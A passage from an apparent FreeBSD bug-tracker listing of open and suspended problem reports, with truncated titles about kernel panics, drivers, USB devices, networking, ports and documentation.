fault in sync o docs/96207 doc Comments of a sockaddr_un structure could confuse one o kern/96171 [ata] burncd (ATA driver) fails to write in vcd mode o kern/96157 Subtle incompatability of FreeBSD and LITE-ON SOHW-167 s usb/96120 usb [ums] [request] USB mouse not always detected o conf/96094 [gif] startup scripts do not configure gif interfaces o kern/96040 [mpt] LSI1030 mpt0: bullet missed in timeout o kern/96030 net [bfe] [patch] Install hangs with Broadcomm 440x NIC in o stand/96016 standards [headers] clock_getres et al should be in o conf/96015 uncommenting the msgs invocation in /etc/profile can f f bin/95979 obrien [patch] burncd(8) fails to fixate CDs o gnu/95936 egrep(1) misparses multiline parenthetical grouping o amd64/95888 amd64 [ata] kernel: ad2: TIMEOUT - WRITE_DMA retrying on HP p bin/95715 [patch] random(6) busy loop under some conditions o bin/95698 philip [patch] moused(8): Software control of sysmouse o bin/95692 gdb(1): GDB in base of both FreeBSD 6 and 5 is ancient o gnu/95691 GDB segfaults on my programme in both FreeBSD 6 and 5 o kern/95661 [pci] [patch] pci_pci still not correct for initializi s usb/95636 usb [umass] [boot] 5 minute delay at boot when using VT620 o usb/95562 usb [umass] Write Stress in USB Mass drive causes "vinvalb o kern/95559 RELENG_6: write(2) fails with EPERM on TCP socket unde o ports/95541 roam dns/djbdns WITH_IPV6 queries ip6.int o kern/95532 [gif] if_gif has artificial limitations o kern/95519 net [ral] ral0 could not map mbuf o kern/95512 [uplcom] uplcom(4) causes system hangups o kern/95459 Rebooting the system while rebuilding RAID (Intel Matr o docs/95408 remko install over serial console does not work as documente o kern/95407 [atapicam] atapicam, cd and /etc/rc.d/devfs problem o kern/95405 [libkvm] libkvm does not support /dev/fwmem0.0 in Free s usb/95348 usb [keyboard] USB keyboard unplug causes noise on screen o bin/95339 [libexec] [patch] rtld is thread-unsafe. fixes for dlo a kern/95307 vanhu [ipsec] Panic (race condition?) in ipsec_process_done o kern/95288 net [pppd] [tty] [panic] if_ppp panic in sys/kern/tty_subr o kern/95277 net [netinet] [patch] IP Encapsulation mask_match() return o kern/95267 net packet drops periodically appear o kern/95239 [libc] [patch] nftw(3) returns EINVAL for large values o kern/95222 fs [iso9660] File sections on ISO9660 level 3 CDs ignored f i386/95106 gavin [install] cannot install freebsd, Nvidia nForce 2 base o kern/95086 multimedia [sound] uaudio line in problem with sbdm lx s ports/95085 portmgr [PATCH]: bsd.port.mk: Add knob to allow for mutually e o kern/95084 ipfw [ipfw] [regression] [patch] IPFW2 ignores "recv/xmit/v o bin/95082 [patch] ping(8) won't handle large preload patterns o bin/95079 [patch] apply(1) dies when there are two %1 in command o usb/95037 usb [umass] USB disk not recognized on hot-plug. o bin/95002 [libc] hash db source code has a bug which prevents us o kern/94978 [pam] pam_opie module option without "no_fake_prompts" o ports/94935 cy security/aide: propose an AIDE_CONF knob for make.conf f i386/94911 gavin [ata] [regression] ata regression with DOM-IDE o kern/94898 [pcmcia] GPRS PCMCIA card cause interrupt storm and co o usb/94897 usb [panic] Kernel Panic when cleanly unmounting USB disk s bin/94892 [rpc] rpc.lockd does not interoperate with Solaris 10 s kern/94863 net [bge] [patch] hack to get bge(4) working on IBM e326m o kern/94849 fs [ufs] rename on UFS filesystem is not atomic o kern/94838 scsi Kernel panic while mounting SD card with lock switch o o kern/94830 [nfs] [patch] mount_nfs causes a fatal trap 18 if the a kern/94827 [libc] mmap with given (void *addr) may lock memory-ma o kern/94823 [drm] DRM doesnt't work with i915.ko o bin/94810 fsck(8) incorrectly reports 'file system marked clean' o kern/94772 [fifo] [patch] FIFOs (named pipes) + select() == broke o kern/94769 fs [ufs] Multiple file deletions on multi-snapshotted fil o bin/94750 watch(8) utility faults when tty disconnects o kern/94733 fs [smbfs] smbfs may cause double unlock o stand/94729 standards [libc] fcntl() throws undocumented ENOTTY o usb/94717 usb [ulpt] Reading from /dev/ulpt can break work of a UHCI o gnu/94695 bugmeister send-pr.el is missing from send-pr distribution o ports/94690 ume [patch] Daemons in /usr/local/etc/rc.d/ must do "setss o amd64/94677 amd64 [panic] panic in amd64 install at non-root user creati o kern/94669 pjd [vfs] [patch] Panic from Failed Removable Media Mount o bin/94635 snapinfo(8)/libufs only works for disk-backed filesyst o kern/94632 geom [geom] Kernel output resets input while GELI asks for o docs/94625 doc [patch] growfs man page -- document "panic: not enough o kern/94578 [panic] Panic by using rtorrent sometimes o bin/94546 [patch] Make telnet(1) accept 'host:port' on command l o kern/94528 [linprocfs] linprocfs /proc/memory reports wrong size o kern/94519 [libc] [patch] Add UF_HIDDEN file flag; map it to Wind f sparc/94483 sam [ath] ath_hal does not work on 6-release/sparc64 s threa/94467 threads send(), sendto() and sendmsg() are not correct in libc o kern/94424 [bge] BGE5721 or BGE5750? o www/94423 danger [patch] XML'ified release todo list f i386/94420 gavin FreeBSD does NOT support the pcChips M925 motherboard. o kern/94393 [ar] PseudoRAID loses track of the master disk s kern/94390 vwe [vr] poor network performance after promiscuous mode i o usb/94384 usb [panic] kernel panic with usb2 hardware o kern/94369 itetcu [bktr] [patch] Patch to support Leadtek WinFast Tv2000 o kern/94279 multimedia [snd_neomagic] snd_neomagic crashes on FreeBSD 5.4 and o kern/94273 gnn [ipsec] [patch] IPIP decapsulation problem in FAST_IPS o bin/94258 [rpc] O_NONBLOCK may block with rpc.lockd o kern/94256 dfr [nfs] nfs locking/rpc.lockd doesn't understand file de o bin/94252 [rpc] rpc.lockd cannot cancel lock requests o kern/94227 'no dump device defined' on random occasions s kern/94182 [altq] [request] altq support for vlan driver p bin/94181 ume portsnap(8) should remove the trailing dot from the se p bin/94180 ume portsnap(8) does not handle HTTP_PROXY_AUTH correctly o kern/94166 [boot] btx halted with a flashcard plugged o kern/94162 net [bge] 6.x kenel stale with bge(4) s bin/94159 [request] ipsecctl ported from openbsd o kern/94155 [ata] 6.1 CF reader problem: "ad1: FAILURE - SETFEATUR o kern/94139 scottl [amr] [regression] amr broken with LSILogic MegaRAID S s ports/94138 portmgr [patch] Mk/bsd.gcc.mk, Mk/bsd.port.mk: CPUTYPE cause b o bin/94052 [patch] Adds option to script(1) to suppress carriage- o bin/94051 login(1): IP network in login.access ignored unless DN o bin/94032 krion [patch] Enhancement to pkg_add(1) to add -4 flag to fo o kern/93998 [libstand] [patch] panic in libstand when closing raw o ports/93993 portmgr bsd.autotools.mk: Fix libtool shared library versionin o kern/93986 multimedia [sound] Acer TravelMate 4652LMi pcm0 channel dead o amd64/93961 amd64 [busdma] Problem in bounce buffer handling in sys/amd6 o kern/93942 fs [vfs] [patch] panic: ufs_dirbad: bad dir (patch from D f i386/93923 i386 [ata] FreeBSD Install, Sil3112: Cannot dump. No dump d o conf/93899 mount_smbfs can't load libiconv.so during boot up o kern/93887 [kernel] cpu_spinwait calls missing in subr_smp.c o kern/93886 net [ath] Atheros/D-Link DWL-G650 long delay to associate o kern/93885 [ata] ata(4) failure: SETFEATURES SET TRANSFER MODE se o usb/93872 usb [cam] [patch] SCSI quirk required for ELTA 8061 OL USB o bin/93857 [patch] new utility: kiconv_cs_preload(8): Utility for o www/93854 postmaster Cannot proceed to page after the first in mailing list o usb/93828 usb [ohci] [panic] ohci causes panic on boot (HP Pavillion o kern/93825 pf [pf] pf reply-to doesn't work o conf/93815 rc [patch] Adds in the ability to save ipfw rules to rc.d o i386/93809 i386 panic: could not copy LDT on RELENG_5_3 through RELENG o i386/93793 i386 [keyboard] Keyboard stops working after a shutdown -p a kern/93790 cperciva cpufreq missing frequencies f i386/93787 gavin [hang] freebsd 6.0 hangs on atkbd0 on Proliant 1850r s o docs/93785 obrien The man page for ftpchroot(5)/ftpusers(5) contradicts o bin/93776 [crypto] [patch] SHA256_Update / SHA512_Update fail to o kern/93771 [ar] [panic] atacontrol status ar1 causes panic o kern/93770 [drm] ati 9600 PRO radeon not recognized by the system f i386/93762 gavin [hang] [loader] Machine lockup at boot loader countdow o i386/93752 i386 Cannot activate the serial ports on boot probe. BIOS o o kern/93750 [ips] Boot hangs on ips0: resetting adapter, this may o kern/93705 standards [headers] [patch] ENODATA and EGREGIOUS (for glibc com o kern/93685 [pipe] select on pipe write fails from '0' end o docs/93683 chinsan [patch] some typos in klist(1) o misc/93661 [patch] loader(8): prevent *.4th files and friends fro o kern/93634 vwe [msdosfs] False access to renamed files/directories (c o gnu/93629 GNU sort(1) tool dumps core within non-regular locale f i386/93615 gavin [install] Operating system wont install. Problem with o gnu/93566 [patch] sort(1): numeric sort is broken on multi-byte a ports/93560 roam [patch] dns/djbdns-ipv6: Update IPv6 patches o sparc/93530 pf [pf] Incorrect checksums when using pf's route-to on s o bin/93473 des [patch] Let pam_unix(8) use "passwordtime" from login. o kern/93461 [smp] [regression] Intel 440LX SMP freeze (regression o usb/93408 usb [mouse] hw.acpi.cpu.cx_lowest=C3 on AMD Turion causes o kern/93396 dlopen crash with locked page o usb/93389 usb [umass] [patch] Digital Camera Pentax S60 don't work o kern/93381 reboot(8) works but 'reboot -n' hangs f kern/93378 net [tcp] Slow data transfer in Postfix and Cyrus IMAP (wo o misc/93341 phk [nanobsd] [patch] make more flexibitily for NanoBSD cu o kern/93331 [kernel] [patch] broken asm in kernel o bin/93317 ld-elf.so doesn't translate unresolved weak symbol int o bin/93310 des [libpam] [patch] pam_unix ignores 'passwordtime' from o bin/93309 [rpc.quotad] [patch] rpc.rquotad: group quota support o kern/93305 Machine freezes solid running dhcpclient after suspend o kern/93300 ipfw [ipfw] ipfw pipe lost packets o ports/93279 skv devel/cvsmonitor: not useable (/dev/mem: Permission de o bin/93275 sysinstall(8): Failure to install after restarting ins o power/93203 ppc FreeBSD PPC Can't Write to Partitions. o kern/93197 [libc] strptime(3) succeeds on formats it should fail o usb/93155 usb [ulpt] /dev/ulpt0: device busy, USB printer does not w o kern/93128 scottl [sym] FreeBSD 6.1 BETA 1 has problems with Symbios/LSI o gnu/93127 [patch] add __FreeBSD_kernel__ to pre-defines o kern/93093 [libc] xdr_string might call strlen(3) on NULL o kern/93019 net [ppp] ppp and tunX problems: no traffic after restarti o kern/92949 pf [pf] PF + ALTQ problems with latency o kern/92880 net [libc] [patch] almost rewritten inet_network(3) functi o bin/92866 krion pkg_add(1) should return a different result code if pa o usb/92852 usb [ums] [patch] Vertical scroll not working properly on o kern/92798 scsi [ahc] SCSI problem with timeouts o kern/92795 [panic] lockmgr panic during sys_exit file cleanup o kern/92786 [ata] [patch] ATA fixes, write support for LSI v3 RAID o kern/92751 [reboot] camcontrol(8): 5.4 crashes after camcontrol d o kern/92716 [hifn] [hang] hifn driver hangs after a short while wh o kern/92690 silby [tcp] slowstart_flightsize ignored in 6-STABLE o kern/92675 yongari [fxp] [patch] fxp(4) unable to recover from occasional o ports/92651 stas graphics/gmt - WITH_EVERYTHING doesn't fetch o docs/92626 doc jail manpage should mention disabling some periodic sc f kern/92552 net A serious bug in most network drivers from 5.X to 6.X o conf/92523 rc [patch] allow rc scripts to kill process after a timeo o kern/92518 [hptmv] Intense disk activity (large FS newfs and/or m o kern/92512 multimedia [sound] distorted mono output with emu10k1 o kern/92440 mbr Kernel fault in knote when getty opens a serial port s ports/92434 portmgr [patch] Mk/bsd.port.mk automatic show pkg-message o kern/92412 [libexec] [patch] rpc.rstatd reports bogus packets/per o stand/92362 standards [headers] [patch] Missing SIGPOLL in kernel headers o amd64/92337 amd64 [em] FreeBSD 6.0 Release Intel Pro 1000 MT em1 no buff s kern/92279 net [dc] Core faults everytime I reboot, possible NIC issu o kern/92272 fs [ffs] [hang] Filling a filesystem while creating a sna o kern/92270 glebius [ppp]: ppp does not work on renamed network interfaces o kern/92238 [ata] [patch] Spurious "atapci1: failed to enable memo o i386/92193 i386 [boot] Can't boot from 6.0 Installation CD: BTX halted o usb/92171 usb [panic] panic unplugging Vodafone Mobile Connect (UMTS o kern/92164 scottl [ips] [lor] SCSI target mode LOR o usb/92142 usb [uhub] SET_ADDR_FAILED and SHORT_XFER errors from usb o kern/92104 des [panic] kernel panic near readlink syscall o kern/92092 [iicbus] [patch] Panic if device with iicbus child is o kern/92090 net [bge] bge0: watchdog timeout -- resetting o usb/92083 usb [ural] [panic] panic using WPA on ural NIC in 6.0-RELE o bin/92062 phk mdconfig(8): mdconfig -l shows 95 entries max. o usb/92052 usb [ulpt] usbd causes defunct process with busy file-hand o kern/92023 [kernel] 'options DEVICE_POLLING' makes loadavg wrong o bin/91993 sam dhclient(8) option missing, script incompability o kern/91954 [libpam] [patch] Proposed enhancement for pam_krb5: "o o kern/91910 scottl [aac] [regression] aac driver hangs on Dell PE800 with o kern/91908 darrenr [ipnat] loading ipl.ko to the kernel compiled with opt o usb/91906 usb [ehci] [hang] FreeBSD hangs while booting with USB leg o usb/91896 usb camcontrol(8): Serial Number of USB Memory Sticks is n o i386/91871 i386 [boot1] [patch] boot1: jump to 0xf000:0xfff0 instead o o kern/91859 net [ndis] if_ndis does not work with Asus WL-138 o kern/91847 ipfw [ipfw] ipfw with vlanX as the device o ports/91838 danfe graphics/svgalib: tty switching is broken o usb/91811 usb [umass] Compact Flash in HP Photosmart 2610 return " s kern/91777 net [ipf] [patch] wrong behaviour with skip rule inside an s i386/91748 acpi acpi problem on Acer TravelMare 4652LMi (nvidia panic, o i386/91745 i386 [smp] Second processor not detected on Proliant ML530 o conf/91732 [patch] 800.loginfail: fix log message grep expression o kern/91719 [pxeboot] BZ2_bzDecompress returned -3 error on loadin o usb/91629 usb [usb] usbd_abort_pipe() may result in infinite loop o bin/91606 sha1(1): sha1 /dev is suspended o kern/91594 net [em] FreeBSD > 5.4 w/ACPI fails to detect Intel Pro/10 o kern/91572 [atapicam] [panic] writing to UFS/softupdates DVD medi f kern/91568 fs [ufs] [panic] writing to UFS/softupdates DVD media in o usb/91546 usb [umodem] [patch] Nokia 6630 mobile phone does not work o www/91539 www FreeBSD web site renders very badly o usb/91538 usb [ulpt] [patch] Unable to print to EPSON CX3500 o bin/91536 burncd(8): burncd -t feature strangeness o docs/91506 doc ndis(4) man page should be more specific about support f kern/91476 gavin [fdc] [patch] floppy drive doesn't work in MS Virtual o kern/91414 emaste [kernel] [patch] Polling for devices other than NICs o kern/91407 [crypto] [panic] Kernel panic when heavily loading cry o amd64/91405 amd64 [asr] [panic] Kernel panic caused by asr on 6.0-amd64 o bin/91393 window(1) changes console cursor shape to blink o kern/91364 net [ral] [wep] WF-511 RT2500 Card PCI and WEP o kern/91347 rodrigc [pci] [patch] Add another PCI-e chipset for extended c o conf/91342 [devfs] Errors in devfs.rules files don't get logged o kern/91339 [psm] mousedriver do not recognize aditional buttons o o kern/91311 net [aue] aue interface hanging o bin/91299 yar [patch] add ftpd(8) SITE SHA256 command p kern/91293 delphij [svr4] [patch] *Experimental* Update to the SVR4 emula s kern/91290 [ata] ata(4) error on 7.0-CURRENT-20051229-SNAP-PC98 o usb/91283 usb [boot] [regression] booting very slow with usb devices o usb/91238 usb [umass] USB tape unit fails to write a second tape fil o docs/91174 doc [REQUEST] Handbook: Addition of Oracle 9i installation o docs/91149 doc read(2) can return EINVAL for unaligned access to bloc o kern/91134 fs [smbfs] [patch] Preserve access and modification time f conf/91106 i18n [locale] date definitions in pl_PL locale are wrong o bin/91101 edwin [patch] whereis(1): make more readable s kern/91038 acpi [panic] [ata] [acpi] 6.0-RELEASE on Fujitsu Siemens Am o bin/91034 [patch] minor fix to iostat(8) so that columns line up o kern/91023 [sysctl] cpufreq/p4tcc: sysctl: dev.cpu.0.freq: Device o kern/90973 thompsa [net] [patch] if_bridge does not handle arp for own ad o kern/90890 net [vr] Problems with network: vr0: tx shutdown timeout f conf/90863 dougb [patch] 6.0 boot: name resolution broken for daemon st o kern/90837 [sound] PCM - ICH6 - device is busy, but old process d a kern/90815 fs [smbfs] [patch] SMBFS with character conversions somet o usb/90700 usb [umass] [panic] Kernel panic on connect/mount/use umas o bin/90690 ps(1) errorneously respects terminal column settings w o bin/90687 avg [patch] side effect of -delete option of find(1) o bin/90680 [patch] make(1) thinks "^.for.o:" is a directive (".fo o bin/90656 sysinstall(8): 6.0-RELEASE (i386) cannot be installed o kern/90582 geom [geom] [panic] Restore cause panic string (ffs_blkfree o kern/90580 [libc] wordexp(3) fails to check for EINTR o bin/90524 reset(1) doesn't fully restore terminal state o kern/90442 [panic] kmem_alloc fails kmem_map: too small, on a RAI o ports/90436 portmgr [patch] Add a way to handle configuration files to bsd o bin/90384 [patch] chroot patch for sftp-server(8) o kern/90368 [pxeboot] pxeboot misses ${class} parameter when booti s bin/90367 [request] libmap.conf needs exclusivity support o bin/90311 [patch] add "eject" to mt(1) o kern/90282 scsi [sym] SCSI bus resets cause loss of ch device o bin/90266 philip bsnmpd(1) returns bad data during a snmpwalk of the en s kern/90243 acpi Laptop fan doesn't turn off (ACPI enabled) (Packard Be o kern/90237 [drm] [panic] panic in sis DRM o kern/90206 [ata] [reboot] Server reboot after "FAILURE - out of m a conf/90163 dougb [patch] Easily launch non-forking daemons like logsurf o bin/90130 [patch] sysctl(8): print temperature in celsius only w o bin/90114 [patch] pw(8) takes strings after option -g for GID 0 o bin/90093 geom fdisk(8) incapable of altering in-core geometry s kern/90086 net [hang] 5.4p8 on supermicro P8SCT hangs during boot if s bin/90082 matteo [syscons] [patch] curses ACS line graphics support for o kern/89991 fs [ufs] softupdates with mount -ur causes fs UNREFS f kern/89989 bz [jail] [patch] Add option -I (ASCII 73) PID to specif o bin/89988 [patch] bootparamd(8) null host support and whoami fix p kern/89966 rodrigc [ntfs] [panic] mounting ntfs causes kernel panic in so o bin/89959 brooks dhclient(8): dhcp: ip length 314 disagrees with bytes o usb/89954 usb [umass] [panic] USB Disk driver race condition? o conf/89870 rc [patch] [request] make netif verbose rc.conf toggle o kern/89837 [pci] PCI code outputs superfluous "failed to enable/d o bin/89799 [patch] Making natd(8) not require a newline at the en o kern/89775 [kqueue] [hang] kevent hangs on second wait for /dev/d o bin/89770 des [patch] pam_krb5 'authentication token failure' in pas o bin/89762 edwin [patch] top(1) startup is very slow on system with man f kern/89752 dwmalone [bpf] [patch] bpf_validate() needs to do more checks f kern/89738 [ndis] [hang] Can't make WL8000PCM wifi card work with a kern/89660 geom [vinum] [patch] [panic] due to g_malloc returning null a conf/89589 secteam virecover follows hardlinks, possibly exposing sensiti o kern/89553 [bktr] [patch] going from 5.3 -> 6.0 winTV card not pr o kern/89546 geom [geom] GEOM error o kern/89522 6.0-RELEASE will not boot on some Compaqs with mouse c o amd64/89501 amd64 [install] System crashes on install using ftp on local o docs/89492 attilio vfs doc: some VOP_*(9) manual pages are outdated with o ports/89441 hrs TeX support in FreeBSD is problematic. f kern/89411 acpi [acpi] acpiconf bug o bin/89410 [patch] sh(1) missing \u interpolation and bug/fix in o bin/89403 fetch(1) doesn't honour authentication credentials whe o kern/89396 [reboot] remounting cdrom causes reboot o bin/89326 [patch] Add pattern matching to login.access(5) p docs/89325 trhodes [patch] Clarification of kbdmap(5), atkbd(4) and kbdco s kern/89305 vwe [vr] [patch] D-Link NIC with VIA Rhine II, lost of Net s kern/89271 [radeon] [agp] [hang] X.org hangs when heavily using R o kern/89258 [mouse] synaptic touchpad support "worse" with hw.psm. o i386/89249 [ataraid] HighPoint RocketRAID 1520 (HPT372N) can't wr o kern/89179 Random reboots on Dell PowerEdge 6300 o kern/89166 [mouse] jumpy mouse movement s kern/89102 geom [geom] [panic] panic when forced unmount FS from unplu o kern/89070 [panic] NULL m passed to m_copym() in ip_fragment() o conf/89061 rc [patch] IPv6 6to4 auto-configuration enhancement s usb/89003 usb [request] LaCie Firewire drive not properly supported o kern/88962 [panic] Kernel panic with ACPI is enabled f i386/88929 i386 [ata] FreeBSD 6.0 install CD fails to find disks on So o kern/88914 [hang] system freeze during file transfer o conf/88913 rc [patch] wrapper support for rc.subr o bin/88826 randi sysinstall(8): sysinstall infinity wait for da0 o bin/88821 pjd [patch] IPv6 support for ggated(8) o amd64/88790 amd64 [panic] kernel panic on first boot (after the FreeBSD o bin/88780 [patch] Baseline ipmon(8) uses LOG_LOCAL0 syslog, not s i386/88755 i386 [install] FreeBSD R6.0 on ThinkPad R40 installation re o usb/88743 usb [hang] [regression] USB makes kernel hang at boot (reg o misc/88680 [build] !compiling freebsd components o kern/88659 ipfw [modules] ipfw and ip6fw do not work properly as modul o kern/88657 fs [smbfs] windows client hang when browsing a samba shar o bin/88655 [patch] tcsh(1): /bin/tcsh ls-F : Floating exception ( f bin/88619 brian [ppp] ppp chat auth fails ( pppoe ) o kern/88601 geom [geli] geli cause kernel panic under heavy disk usage o bin/88599 ifconfig(8): change in default behavior with ifconfig o amd64/88568 amd64 [panic] 6.0-RELEASE install cd does not boot with usb o kern/88555 [panic] ffs_blkfree: freeing free frag on AMD 64 a bin/88538 [patch] tcsh(1) ls-F spacing incorrect. o bin/88524 openssl(1) can not work with smtp.gmail.com o kern/88518 rodrigc cannot mount root rw at boot o docs/88512 doc [patch] mount_ext2fs(8) man page has no details on lar s i386/88491 i386 [install] Panic when boot installation CD1 (Acer Trave o kern/88487 [panic] softdep_setup_inomapdep: found inode o kern/88450 andre SYN+ACK reports strange size of window o usb/88408 usb [axe] axe0 read PHY failed o kern/88336 vanhu [ipsec] [patch] setkey(8) -D fails to report all SAs o kern/88320 [nis] ypxfr(8) talks IPv6 to IPv4-only portmap -> ypin o kern/88266 fs [smbfs] smbfs does not implement UIO_NOCOPY and sendfi o bin/88215 [patch] syslogd(8) does not pass cleanly parameters to o kern/88182 [ural] [wep] wep is broken in ural(4) hostap mode o kern/88150 des [pam] PAM does not search /usr/local/lib for modules s i386/88139 i386 [i386] [request] 53C875 Chipset HP 5064-6016 doesn't w o gnu/88087 c++filt(1) dumps core on a trivial string "STYLEPROP_" f kern/88082 net [ath] [panic] cts protection for ath0 causes panic o bin/88056 [patch] [request] cp(1) could really use Linux's -x op o kern/88047 [asr] [panic] 6.0-RC1 reboots with SMP and asr o kern/88045 jhb [nve] [patch] 6.0rc1: nve0: device timeout (51) o kern/88020 cannot boot unless: hint.apic.0.disabled="1" is set on o kern/87990 [kernel] [patch] SMP Race Condition in kdb_enter/kdb_e o bin/87966 [patch] newfs(8): introduce -A flag for newfs to enabl o docs/87936 doc Handbook chapter on NIS/YP lacks good information on a o conf/87925 [patch] [request] modify output of 405.status_ata_raid o kern/87859 fs [smbfs] System reboot while umount smbfs. o docs/87857 doc ifconfig(8) wireless options order matters p bin/87841 murray fetch(1) should have options to set http "if-modified- o kern/87836 [devfs] If using ATAPICAM with cd(dvd)rw without media o bin/87792 [patch] very bad performance of cp(1) via NFS, possibl o kern/87782 multimedia [sound] snd_t4dwave and pcm0:record:0: record interrup o kern/87729 phk [libc] [patch] most calls to malloc(3) generate warnin o bin/87726 dfr gssapi.h is not c++ aware o amd64/87689 amd64 [powerd] [hang] powerd hangs SMP Opteron 244 5-STABLE s kern/87653 [drm] ATI Radeon Mobile X600SE not detected by kernel o bin/87651 [patch] fsck(8) (on superblock error) tells wrong man o usb/87648 usb [mouse] Logitech USB-optical mouse problem. o kern/87586 [diskless] [vm] [panic] Unable to use networked swap i o kern/87544 geom [gbde] mmaping large files on a gbde filesystem deadlo s bin/87529 [request] pw(8): "pw lock", "pw unlock" should support o kern/87521 net [ipf] [panic] using ipfilter "auth" keyword leads to k o kern/87515 Splash screen fails to load on boot o kern/87506 net [vr] [patch] Fix alias support on vr interfaces o kern/87421 [netgraph] [panic]: ng_ether + ng_eiface + if_bridge s ports/87420 portmgr [patch] bsd.port.mk: implementing WITH_OPENLDAP_VER to o ports/87397 edwin incorrect use of PAPERSIZE make variable in some ports f kern/87368 bde [msdosfs] fat32 is very slow o amd64/87316 amd64 [vge] "vge0 attach returned 6" on FreeBSD 6.0-RC1 amd6 o amd64/87305 amd64 [smp] Dual Opteron / FreeBSD 5 & 6 / powerd results in o usb/87224 usb [usb] Cannot mount USB Zip750 p conf/87196 matteo human readable disk free in daily output run o kern/87194 net [fxp] fxp(4) promiscuous mode seems to corrupt hw-csum o www/87119 hrs [patch] encode copyright and such symbolically s kern/87094 5.4 system with SMP and IPFW crashes under load (mbuf o kern/87074 mlaier pf does not log dropped packets when max-* stateful tr o kern/87032 ipfw [ipfw] [patch] ipfw ioctl interface implementation o bin/87022 telnet(1) hang in ptcout o kern/87010 pjd Reading kernel memory & pagefault under non-root o kern/86957 ipfw [ipfw] [patch] ipfw mac logging o kern/86944 [nfs] [patch] When I use FreeBSD with NFS client, clos s kern/86920 net [ndis] ifconfig: SIOCS80211: Invalid argument [regress o i386/86880 i386 [hang] 6.0 hangs or reboots whilst 5.4 is stable (ASUS o kern/86871 allocation logic for PCBs in TIME_WAIT state causes pa o bin/86859 kensmith sysinstall(8): Installer should ask about Linux earlie o usb/86767 usb [umass] [patch] bogus "slice starts beyond end of the o bin/86765 bsdlabel(8) assigning wrong fs type. o kern/86763 [ucom] kernel: ucom0: ucomwritecb: IOERROR a kern/86752 mlaier pf does not use default timeouts when reloading config o bin/86665 randi sysinstall(8): sysinstall binary upgrade clobbers name o bin/86635 pf [patch] pfctl(8): allow new page character (^L) in pf. o kern/86619 [linux] linux emulator interacts oddly with cp o bin/86600 matteo sysinstall(8): Sysinstall boot manager screen is misle o kern/86587 fs [msdosfs] rm -r /PATH fails with lots of small files o bin/86485 [patch] hexdump(1): hexdump -s speedup on /dev a stand/86484 standards [patch] mkfifo(1) uses wrong permissions o bin/86454 sysinstall(8): sysinstall terminates with signal 10 if p kern/86437 andre tcp_input.c and tcp_sack.c refer to obsolete ICPM_BAND o kern/86427 gnn [lor] Deadlock with FASTIPSEC and nat o kern/86411 scottl [amr] Very low performance of amr(4) under FreeBSD-6.0 o bin/86405 more(1) segmentation fault s ports/86401 stas new ports multimedia/zapping o bin/86388 [patch] periodic(8) daily should backup bsdlabel(8) / o docs/86342 doc bikeshed entry of Handbook is wrong s kern/86319 [nfs] [request] support a "noac" NFS mount flag to tur o usb/86298 usb [mouse] Known good USB mouse won't work with correct s o kern/86290 jeff [kernel] [patch] minor optimizations + cleanup to vrel f kern/86261 brian 'out of buffer space' after many PPPoE re-dial attempt o ia64/86218 ia64 Mozilla / Firefox: regxpcom or regchrome broken on ia6 o kern/86103 net [ipf] Illegal NAT Traversal in IPFilter o kern/86055 FreeBSD 6.0 beta4 install panic:bio already on queue o bin/86012 kpasswd(1) fails if one of the KDC are unreachable. o kern/86003 Startup reports "failed to attach P_CNT" s kern/85975 [cam] devfs does not create entries when removable med o kern/85971 jeff [uma] [patch] minor optimization to uma o kern/85931 panic: "vm_fault: fault on nofault entry" when using m o gnu/85895 [patch] cc -print-search-dirs returns (null) o kern/85894 [nfs] [panic] nfs_timer / nfs_socket.c:1146 panic o kern/85886 [an] [patch] an0: timeouts with Cisco 350 minipci o gnu/85824 obrien gas crashes when assembling this file o conf/85819 rc [patch] script allowing multiuser mode in spite of fsc o kern/85816 maxproc=1 in login.conf causes kernel panic when loggi o kern/85813 timeout waiting for read DRQTrying to mount root from o kern/85809 darrenr panic: mutex "ipf state entry" already initialized o kern/85780 net 'panic: bogus refcnt 0' in routing/ipv6 o kern/85768 gibbs [ahd] aic79xx driver timeouts with U160 target (free l o kern/85751 [devfs] [panic] panic in devfs_setattr() when running o bin/85712 uncompress(1) program emits bogus "overwrite?" prompt o ports/85707 nork port www/linuxpluginwrapper makes mozilla coredump s kern/85658 jeff [sched_ule] [patch] add DDB command, show runq, to sch o kern/85657 [kernel] [patch] capture and expose per-CPU time accou o i386/85656 i386 [i386] [patch] expose more i386 specific CPU informati o i386/85655 i386 [i386] [patch] expose cpu info for i386 systems o i386/85653 i386 [i386] [patch] relieve hangs in tight loops in process o i386/85652 i386 [loader] [patch] deal with out-of-memory errors during o kern/85651 [kernel] [patch] debugging code to show entries in eve o kern/85650 [libstand] [patch] modifications to tftp-based PXE boo s ports/85513 Intel C++ compiler not 100% binary compatible with sys o bin/85494 fsck_ffs: unchecked use of cg_inosused macro etc. o kern/85493 imp [ed] [patch] OLDCARD can't probe ed driver o kern/85464 Cannot unmount file-backed disk imported from NFS or S o kern/85450 [ata] [panic] subdisk6 detached (appears to be a sata o bin/85445 net ifconfig(8): deprecated keyword to ifconfig inoperativ s kern/85444 vwe [stf] IPv6 crash, possibly related to destroying stf i o i386/85423 i386 [ex] ex(4) does not correctly recognize NIC in PnP mod o i386/85417 i386 [i386] [npx] [patch] Possible bug in ia32 floating-poi o alpha/85346 alpha PREEMPTION causes unstability in Alpha4000 SMP kernel o kern/85326 fs [smbfs] [panic] saving a file via samba to an overquot p kern/85320 gonzo [gre] [patch] possible depletion of kernel stack in ip s amd64/85273 amd64 [install] FreeBSD (NetBSD or OpenBSD) not install on l o kern/85266 net [xe] [patch] xe(4) driver does not recognise Xircom XE o kern/85258 mux [fxp] changing promisc mode on nic can lead to kernel o kern/85257 [boot] BTX boot loader fails on USB CDROM (HP DL145 Op o kern/85137 des [pseudofs] [patch] panic due to sleep with held mutex o docs/85128 doc [patch] loader.conf(5) autoboot_delay incompletly desc o kern/85123 [iir] Improper serialization in iir_ioctl() allows iir o bin/85115 byacc generates uncompileable file p stand/85099 remko POSIX violation in split(1) o kern/85086 wkoszek [ef] [patch] Locking fixes for ef(4) (+removes mem. le s i386/85072 i386 [psm] ps/2 Mouse detection failure on compaq chipset s usb/85067 usb [uscanner] Cannot attach ScanJet 4300C to usb device o bin/85011 restore(8) on 5.4 will not read Solaris-sparc dumps, w o kern/84981 [headers] [patch] header protection for with aroun p kern/78179 alc [vm] [patch] bus_dmamem_alloc() with BUS_DMA_NOWAIT ca o bin/78170 [patch] Fix signal handler in bootpd(8) o bin/78131 geom gbde(8) "destroy" not working. o kern/78114 phk [geom] [patch] Solaris/x86 label structures for GEOM ( o kern/78090 net [ipf] ipf filtering on bridged packets doesn't work if o bin/78087 groups(1) program inconsistency o kern/78021 sem_open(3) doesn't mention fnctl.h include 